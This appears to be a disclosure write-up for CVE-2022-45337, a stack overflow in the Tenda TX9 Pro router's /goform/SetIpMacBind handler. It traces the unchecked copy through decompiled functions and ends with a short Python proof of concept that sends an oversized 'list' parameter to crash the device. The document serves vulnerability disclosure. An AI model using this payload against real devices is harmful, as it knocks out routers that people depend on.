CVE-2022-45337: Vulnerability/Tenda/TX9Pro/1 at master · no1rr/Vulnerability
Tenda TX9 Pro v22.03.02.10 was discovered to contain a stack overflow via the list parameter at /goform/SetIpMacBind.
Affect device: Tenda-TX9 Pro V22.03.02.10 (https://www.tendacn.com/download/detail-4219.html)
Vulnerability Type: Stack overflow
Impact: Denial of Service(DoS)
Vulnerability description
This vulnerability is a stack overflow triggered in the sub_42EDE4 function, which satisfies the request of the upper-level interface function sub_42F124, that is, handles the post request under /goform/SetIpMacBind
The sub_42F124 function calls sub_42EFF8 function
In the sub_42EFF8 function, the two local variables v4 and v5 are obtained directly from the http request parameter bindnum and list, respectively .
The address of v5 (v9) is used as the second parameter of the sub_42EDE4 function
Then it calls sub_42EDE4 function
In the sub_42EDE4 function, v6 is incoming list parameter, and it is copied to v18 without length limit and security check. So the attacker can cause stack overflow through a long list and achieve denial of service attack
import requests from pwn import *
url = “” cookie = {"Cookie":"password=aaa"} data = {"bindnum": "1", “list":"\r” + “A” * 0x500}
requests.post(url, cookies=cookie, data=data)